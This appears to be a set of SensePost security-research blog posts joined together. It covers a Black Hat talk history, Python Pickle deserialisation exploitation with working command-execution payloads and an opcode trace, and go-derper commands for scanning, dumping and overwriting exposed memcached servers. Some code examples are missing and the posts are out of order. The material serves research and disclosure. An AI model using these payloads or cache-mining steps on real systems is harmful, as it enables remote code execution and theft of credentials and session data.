You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.
Under the hood, the Zigbee and Z-Wave wireless communication protocols are the most commonly used RF technologies in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security research efforts. Z-Wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical (ISM) radio band. It transmits on the 868.42 MHz (Europe) and 908.42 MHz (United States) frequencies and is designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.
Unlike Zigbee, the Z-Wave protocol has seen almost no public security research, except for a DefCon 2011 talk in which the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and shows how the Z-Wave protocol can be subjected to attacks.
The talk is being presented by Behrang Fouladi, a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured out how to clone the SecurID software token.
Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:
Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced in a 2004 book by Ed Skoudis.
A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually led to the creation of Maltego.
Our thinking around pentest automation, and in particular footprinting and link analysis, was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".
In this talk we literally did introduce two proxy tools. The first was "Suru", our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been surpassed by excellent tools like "Burp Proxy", it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.
The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scapy packet manipulation program. We never took that any further, however.
This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.
In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.
Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in were discussed. The cloud offerings from Amazon, Salesforce and Apple, as well as their security, were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Dai Zovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.
This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.
Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however, there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outlined hurdles facing a shellcoder and provided guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library. We also wrote a very fancy paper about it all...
For this year's show we'll be back on the podium with Behrang's talk, as well as an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.
See you in Vegas!
Thanks for stopping by. This is the third posting on the bowels of Python Pickle, and it's going to get a little more complicated before it gets easier. In the previous two entries I introduced Pickle as an attack vector present in many memcached instances, and documented tricks for executing OS commands across Python versions as well as a mechanism for generically calling class instance methods from within the Pickle VM.
In this post we'll look at executing pure Python code from within a Pickle stream. While running os.system() or one of its cousins is almost always a necessity, having access to a Python interpreter means that your exploits can be that much more efficient (skip on the shell syntax, slightly more portable exploits). I imagine one would tend to combine the pure Python with os.system() calls.
eval("import os; os.system('ls')")
fails. It's worth noting that one can still call methods in expressions, so
can work if the 'os' module is present in the environment. If it isn't, you can still import 'os' with the expression:
or even execute a full code block with a double eval():
Moral of that story: don't ever eval() untrusted input. Obviously.
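The distinction between expressions and statements is easy to check at a prompt. The following is a minimal sketch rather than the original examples: it assumes Python 3 (the sessions in this post are Python 2), it uses the harmless os.getcwd() as a stand-in for os.system('ls'), and the nested call at the end is only one possible shape of a "double eval()".

```python
import os

# eval() only accepts expressions, so a statement such as "import" is rejected.
try:
    eval("import os; os.getcwd()")
    statement_rejected = False
except SyntaxError:
    statement_rejected = True

# A method call is an expression, so this works when 'os' is already in scope.
cwd_direct = eval("os.getcwd()", {"os": os})

# __import__() is a function call, i.e. an expression, so it can replace "import".
cwd_imported = eval("__import__('os').getcwd()", {})

# A nested eval() over a compiled code block runs full statements.
# 'scope' is a hypothetical namespace used to collect the result.
scope = {}
eval("eval(compile('import os; cwd = os.getcwd()', 'foo', 'exec'))", scope)
cwd_block = scope["cwd"]
```

All three working variants return the same directory; only the plain import statement is refused.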
However, we want to execute not only expressions but full Python scripts. eval() will also accept a code object, which is produced by compile(), and compile() will accept a full Python script. For example, to prove execution here's the venerable timed wait:
cmd = "import os; f=os.popen('sleep 10'); f.read()"
c = compile(cmd,"foo","exec")
eval(c)  # runs the compiled script; blocks for roughly ten seconds
>>> ret=eval(compile("import os; f=os.popen('ls'); f.read()","foo","exec"))
>>> print ret
None
This is because eval() always returns "None" if the supplied code object was compiled with "exec", which means we need a different trick for extracting the contents of the eval'ed script. Luckily our first idea worked (yay), so we didn't look further; there may be better/faster/easier options. That idea was to modify the script's globals (variables scoped for the entire script) inside the eval() call, and access globals outside the eval() call. This works because globals are passed into eval() and changes are reflected after the call returns:
>>> print smashed
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'smashed' is not defined
>>> eval(compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec"))
>>> print smashed
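The same globals trick can be reproduced without touching the shell. This is a hedged sketch under a few assumptions: it targets Python 3, it passes an explicit dict (the hypothetical name "namespace") instead of relying on the interpreter's own globals, and it assigns a plain string where the session above reads from os.popen().

```python
# Explicit dict standing in for the interpreter session's globals.
namespace = {}
defined_before = "smashed" in namespace

# An "exec"-mode code object may contain statements, including assignments.
code = compile("smashed = 'output of the script'", "foo", "exec")

# eval() runs the code object but evaluates to None for "exec"-mode code.
ret = eval(code, namespace)

# The assignment made inside the script is visible in the dict afterwards.
result = namespace.get("smashed")
```

The return value carries nothing useful, so the dict handed to eval() is the only channel through which the script's output comes back.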
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
This executes 'ls -al', stores its output in the "smashed" global variable and returns the whole globals dict as the end result of depickling. However, it is messy; globals contains other entries, which wastes space and makes the output harder to read. If we're inserting this into a broader pickle, we'd like to have more control (i.e. return a single string) rather than hope that whatever object we are injecting into can handle a dict.
code=compile("import os; f=os.popen('ls'); smashed=f.read()","foo","exec")
Converted into Pickle we get:
(S'import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'
The execution trace of this Pickle stream is:
[SB] [__builtin__.eval] [MARK]
[SB] [__builtin__.eval] [MARK] [__builtin__.compile]
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK]
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n']
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] ['']
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [MARK] ['import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n'] [''] ['exec']
[SB] [__builtin__.eval] [MARK] [__builtin__.compile] [('import os\\np=os.popen("ls -al")\\nsmashed=p.read()\\n','','exec')]
[SB] [__builtin__.eval] [MARK] [code_object]
[SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals]
[SB] [__builtin__.eval] [MARK] [code_object] [__builtin__.globals] [()]
[SB] [__builtin__.eval] [MARK] [code_object] [<globals dict>]
[SB] [__builtin__.eval] [(code_object, <globals dict>)]
[SB] [MARK] [__builtin__.globals]
[SB] [MARK] [__builtin__.globals] [()]
[SB] [MARK] [<globals dict>]
[SB] [MARK] [<globals dict>] ['smashed']
[SB] [(<globals dict>,'smashed')]
[SB] [(<globals dict>,'smashed')]
[SB] [__builtin__.getattr] [MARK]
[SB] [__builtin__.getattr] [MARK] [__builtin__.dict]
[SB] [__builtin__.getattr] [MARK] [__builtin__.dict] ['get']
[SB] [__builtin__.getattr] [(__builtin__.dict,'get')]
[SB] [__builtin__.apply] [MARK]
[SB] [__builtin__.apply] [MARK] [dict.get]
[SB] [__builtin__.apply] [MARK] [dict.get] [(<globals dict>, 'smashed')]
[SB] [__builtin__.apply] [(dict.get,(<globals dict>, 'smashed'))]
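For readers who want to replay the trace, here is a hand-written stream that follows the same steps. It is a sketch and not the original payload, with three assumptions: it targets Python 3, so "builtins" replaces "__builtin__"; dict.get is invoked directly through REDUCE because apply() no longer exists; and the script is harmless arithmetic instead of 'ls -al'.

```python
import pickle

# Protocol-0 opcodes used: c = GLOBAL, ( = MARK, S = STRING, t = TUPLE,
# R = REDUCE (call), 0 = POP, . = STOP.
stream = (
    b"cbuiltins\neval\n"             # push eval
    b"(cbuiltins\ncompile\n"         # MARK, push compile
    b"(S'smashed = 6 * 7'\n"         # MARK, script source
    b"S''\n"                         # filename
    b"S'exec'\n"                     # mode
    b"tR"                            # compile(source, '', 'exec') -> code object
    b"cbuiltins\nglobals\n(tR"       # globals() -> globals dict
    b"tR"                            # eval(code_object, globals_dict) -> None
    b"0"                             # POP the None left behind by eval
    b"cbuiltins\ngetattr\n"          # push getattr
    b"(cbuiltins\ndict\nS'get'\ntR"  # getattr(dict, 'get') -> dict.get
    b"(cbuiltins\nglobals\n(tR"      # MARK, globals() -> globals dict
    b"S'smashed'\n"                  # key to look up
    b"tR"                            # dict.get(globals_dict, 'smashed')
    b"."                             # STOP: top of stack is the result
)

# Depickling runs the script and returns only the value of 'smashed'.
value = pickle.loads(stream)
print(value)
```

Note the side effect: the script writes "smashed" into the globals of whatever code calls pickle.loads(), which is exactly the channel the trace relies on.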
In the last posting on this topic, we'll look at tactical uses for all the Pickle hacking we've covered: where to find Pickle objects, where they're processed and how to modify objects in place. Stay tuned.
In our recent memcached investigations (a blog post is still in the wings) we came across numerous caches storing serialized data. The caches were not homogenous and so the data was quite varied: Java objects, ActiveRecord objects from RoR, JSON, pre-rendered HTML, .Net serialized objects and serialized Python objects. Serialized objects can be useful to an attacker from a number of standpoints: such objects could expose data where naive developers make use of the objects to hold secrets and rely on the user to proxy the objects to various parts of an application. In addition, altering serialized objects could impact on the deserialization process, leading to compromise of the system on which the deserialization takes place.
In all the caches we examined, the most common data format found (apart from HTML snippets) was serialized Python, and this prompted a brief investigation into the possible attacks against serialized Python objects. We've put together a couple of posts explaining how one might go about exploiting Pickle strings; the obvious vector is memcached, but any time Pickle strings are passed to an untrusted party the attacks described here become useful.
Python implements a default serialization technique called Pickle. Now I don't pretend to be a Pickle expert; Python is not my script language of choice for starters and serialization is not a particularly interesting subject to me. However, seeing the following in any docs is cause for further digging:
A little further down the same page, we find a trivial example of how to execute code from a Pickle stream and a quick Google leads to a blog post in which Pickle insecurities are fleshed out in more detail. Both are worthwhile reads.
From these sources emerge the following factoids:
This last point was particularly intriguing; developers purposely removed any semblance of security from the depickling mechanism and exhort users to never deserialize untrusted data. However, the memcached work showed that if one could find memcached instances, it was possible to overwrite data within the cache trivially. If data inside a cache was comprised of Pickle strings, then by overwriting them an attacker is able to inject untrusted Pickle objects into a deserialization operation.
We've had a bit of fun with this, seeing how far it can be pushed, and over the coming days I'll post three more entries on this topic. In the meantime, here's some background and a few simple examples to get things going.
In order to understand the Pickle objects below, you'll need to follow a few basic opcodes and their arguments:
Testing out Pickle objects is pretty simple:
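As a minimal sketch of such a test (assuming Python 3, where the stream has to be a bytes object), hand-written protocol-0 streams can be fed straight to pickle.loads(). Only the S (string), I (integer) and "." (STOP) opcodes are used here.

```python
import pickle

# S pushes a quoted string, "." stops and returns the top of the stack.
hello = pickle.loads(b"S'hello'\n.")

# I pushes a decimal integer read up to the newline.
number = pickle.loads(b"I42\n.")

print(repr(hello), number)
```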
An important instruction is the MARK opcode "(", which is used to signify frames on the stack. It is normally used in conjunction with opcodes that have to pop multiple objects off the stack, for example opcodes that build lists, tuples or dicts. The two examples below show how a list and a tuple are produced:
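A small sketch of how MARK frames the arguments for the container opcodes, again assuming Python 3 and hand-written protocol-0 streams: "l" builds a list, "t" a tuple and "d" a dict from everything pushed since the most recent "(".

```python
import pickle

# MARK, three integers, then LIST pops back to the MARK.
as_list = pickle.loads(b"(I1\nI2\nI3\nl.")

# Same items, but TUPLE is used to collect them.
as_tuple = pickle.loads(b"(I1\nI2\nI3\nt.")

# DICT consumes the items after the MARK as key/value pairs.
as_dict = pickle.loads(b"(S'a'\nI1\nS'b'\nI2\nd.")

print(as_list, as_tuple, as_dict)
```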
The canonical example of why unpickling untrusted data is bad, given in a number of places including the official Python docs, is:
cos
system
(S'echo hello world'
tR.
The intent is clear; however, the interesting bit is twofold: decoding the instructions used and realizing that, for an attacker, "hello world" isn't all that useful. In the next post I'll introduce the basics behind calling functions and see whether we can extend the canonical example into something a little more evil.
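One way to decode the instructions without running them is the standard library's pickletools module, which parses a stream but never imports or calls anything. The sketch below assumes Python 3 and the canonical stream as it appeared in the Python 2 documentation.

```python
import pickletools

# The canonical "hello world" stream, written out as bytes.
canonical = b"cos\nsystem\n(S'echo hello world'\ntR."

# genops() yields (opcode, argument, position) for each instruction.
ops = [(op.name, arg) for op, arg, _pos in pickletools.genops(canonical)]

for name, arg in ops:
    print(name, arg)
```

Read top to bottom, the stream pushes os.system (GLOBAL), opens a frame (MARK), pushes the command string (STRING), wraps it in an argument tuple (TUPLE), calls the function (REDUCE) and stops (STOP).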
[Update: Disclosure and other points discussed in a little more detail here.]
We chose to look at memcached, a "Free & open source, high-performance, distributed memory object caching system" 1. It's not outwardly sexy from a security standpoint and it doesn't have a large and exposed codebase (total LOC is a smidge over 11k). However, what's of interest is the type of applications in which memcached is deployed. Memcached is most often used in web applications to speed up page loads. Sites are almost 2 always dynamic and either have many clients (i.e. require horizontal scaling) or process piles of data (look to reduce processing time), or oftentimes both. This implies that the sites that use memcached contain more interesting info than simple static sites, and are an indicator of a potentially interesting site. Prominent users of memcached include LiveJournal (memcached was originally written by Brad Fitzpatrick for LJ), Wikipedia, Flickr, YouTube and Twitter.
I won't go into how memcached works; suffice it to say that, since data tends to be read more often than written in common use cases, the idea is to pre-render and store the finalised content inside the in-memory cache. When future requests ask for the page or data, it doesn't need to be regenerated but can simply be regurgitated from the cache. Their Wiki contains more background.
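The render-once, serve-many pattern described above can be sketched in a few lines. Everything here is hypothetical: a plain dict stands in for the memcached server, and render_page() and get_page() are illustrative names, not part of any real application.

```python
cache = {}          # stand-in for a memcached instance
render_calls = []   # records how often the expensive path runs

def render_page(page_id):
    """Pretend to do the expensive work of building a page."""
    render_calls.append(page_id)
    return "<html>page %s</html>" % page_id

def get_page(page_id):
    """Serve from the cache, rendering only on a miss."""
    key = "page:%s" % page_id
    if key not in cache:
        cache[key] = render_page(page_id)
    return cache[key]

first = get_page(7)    # miss: rendered and stored
second = get_page(7)   # hit: served from the cache
```

The point for an attacker is that whatever the application considered worth pre-computing ends up sitting in the cache in finished form.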
insurrection:demo marco$ ruby go-derper.rb -f x.x.x.x
[i] Scanning x.x.x.x
x.x.x.x:11211
==============================
memcached 1.4.5 (1064) up 54:10:01:27, sys time Wed Aug 04 10:34:36 +0200 2010, utime=369388.17, stime=520925.98
Mem: Max 1024.00 MB, max item size = 1024.00 KB
Network: curr conn 18, bytes read 44.69 TB, bytes written 695.93 GB
Cache: get 514, set 93.41b, bytes stored 825.73 MB, curr item count 1.54m, total items 1.54m, total slabs 3
Stats capabilities: (stat) slabs settings items (set) (get)
44 terabytes read from the cache in 54 days with 1.5 million items stored? This cache is used quite frequently. There's an anomaly here in that the cache reports only 514 reads with 93 billion writes; however it's still worth exploring if only for the size.
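Figures like these come from memcached's text-protocol "stats" command, which answers with "STAT name value" lines terminated by "END". The sketch below is not go-derper's code; parse_stats() is a hypothetical helper, and the sample reply uses made-up values rounded from the output above.

```python
def parse_stats(response):
    """Parse a memcached 'stats' reply into a dict of name -> value strings."""
    stats = {}
    for line in response.split("\r\n"):
        if line == "END":
            break
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[0] == "STAT":
            stats[parts[1]] = parts[2]
    return stats

# Illustrative reply only; the values approximate the scan shown above.
sample = (
    "STAT uptime 4701687\r\n"
    "STAT cmd_get 514\r\n"
    "STAT cmd_set 93410000000\r\n"
    "STAT curr_items 1540000\r\n"
    "END\r\n"
)

stats = parse_stats(sample)
uptime_days = int(stats["uptime"]) // 86400
writes_per_read = int(stats["cmd_set"]) / int(stats["cmd_get"])
```

A wildly lopsided writes_per_read value is the kind of anomaly noted above and is worth flagging when triaging targets.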
We can run the same fingerprint scan against multiple hosts using
ruby go-derper.rb -f host1,host2,host3,...,hostn
or, if the hosts are in a file (one per line):
ruby go-derper.rb -F file_with_target_hosts
Output is either human-readable multiline (the default), or CSV. The latter helps for quickly rearranging and sorting the output to determine potential targets, and is enabled with the "-c" switch:
ruby go-derper.rb -c csv -f host1,host2,host3,...,hostn
Lastly, the monitor mode (-m) will loop forever while retrieving certain statistics and keep track of differences between iterations, in order to determine whether the cache appears to be in active use.
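The idea behind monitoring can be illustrated by comparing two snapshots of the counters. This is a sketch of the concept only, not how go-derper implements "-m"; the function names are hypothetical, while cmd_get, cmd_set, bytes_read and bytes_written are standard memcached stat names.

```python
COUNTERS = ("cmd_get", "cmd_set", "bytes_read", "bytes_written")

def stat_deltas(previous, current, names=COUNTERS):
    """Return how much each counter grew between two stats snapshots."""
    return {
        name: int(current[name]) - int(previous[name])
        for name in names
        if name in previous and name in current
    }

def looks_active(deltas):
    """A cache is considered in use if any counter moved."""
    return any(delta > 0 for delta in deltas.values())

# Two illustrative snapshots taken some seconds apart.
earlier = {"cmd_get": "514", "cmd_set": "1000", "bytes_read": "2048"}
later = {"cmd_get": "514", "cmd_set": "1250", "bytes_read": "4096"}

deltas = stat_deltas(earlier, later)
active = looks_active(deltas)
```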
insurrection:demo marco$ ruby go-derper.rb -l -s x.x.x.x
[w] No output directory specified, defaulting to ./output
[w] No prefix supplied, using "run1"
This will extract data from the cache in the form of a key and its value, and save the value in a file under the "./output" directory by default (if this directory doesn't exist then the tool will exit so make sure it's present.) This means a separate file is created for every retrieved value. Output directories and file prefixes are adjustable with "-o" and "-r" respectively, however it's usually safe to leave these alone.
By default, go-derper fetches 10 keys per slab (see the memcached docs for a discussion on slabs; basically similar-sized entries are grouped together.) This default is intentionally low; on an actual assessment this could run into six figures. Use the "-K" switch to adjust:
ruby go-derper.rb -l -K 100 -s x.x.x.x
As mentioned, retrieved data is stored in the "./output" directory (or elsewhere if "-o" is used). Within this directory, each new run of the tool produces a set of files prefixed with "runN" in order to keep multiple runs separate. The files produced are:
At this point, there will (hopefully) be a large number of files in your output directory, which may contain useful info. Start grepping.
What we found with a bit of field experience was that mining large caches can take some time, and repeating grep gets quite boring. The tool permits you to supply your own set of regular expressions which will be applied to each retrieved value; matches are printed to the screen and this provides a scroll-by view of bits of data that may pique your interest (things like URLs, email addresses, session IDs, strings starting with "user", "pass" or "auth", cookies, IP addresses etc). The "-R" switch enables this feature and takes a file containing regexes as its sole argument:
ruby go-derper.rb -l -K 100 -R regexs.txt -s x.x.x.x
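To show what applying a regex file to each retrieved value amounts to, here is a small sketch. It is an illustration of the idea and not the tool's implementation: scan_value() is a hypothetical helper, and the two patterns and the sample value are made up for the example.

```python
import re

# Example patterns of the kind one might keep in a regex file.
patterns = [
    re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),          # email addresses
    re.compile(r"(?i)\b(?:user|pass|auth)\w*"),      # credential-like names
]

def scan_value(key, value, compiled):
    """Return (key, pattern, match) for every regex hit in a cached value."""
    hits = []
    for pattern in compiled:
        for match in pattern.finditer(value):
            hits.append((key, pattern.pattern, match.group(0)))
    return hits

sample_value = "user_email=alice@example.com; auth_token=abc123"
hits = scan_value("session:1", sample_value, patterns)

for key, pattern, text in hits:
    print("%s matched %r: %s" % (key, pattern, text))
```

Printing hits as they occur gives the scroll-by view described above, while the full values remain on disk for closer inspection.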
ruby go-derper.rb -w output/run1-e94aae85bd3469d929727bee5009dddd
This syntax is simple since go-derper will figure out the target server and key from the run's index file.
2 We're hedging here, but we've not come across a static memcached site.
3 If so, you may be as surprised as we were in finding this many open instances.
Wow. At some point our talk hit HackerNews and then SlashDot after swirling around the Twitters for a few days. The attention is quite astounding given the relative lack of technical sexiness to this; explanations for the interest are welcome!
We wanted to highlight a few points that didn't make the slides but were mentioned in the talk:
The potential risk assigned to exposed memcacheds hasn't as yet been publicly demonstrated so it's unsurprising that you'll find memcacheds around. I imagine this issue will flare and be hunted into extinction, at least on the public interwebs.
Lastly, the major interest seems to be on mining data from exposed caches. An equally disturbing issue is overwriting entries in the cache and this shouldn't be underestimated.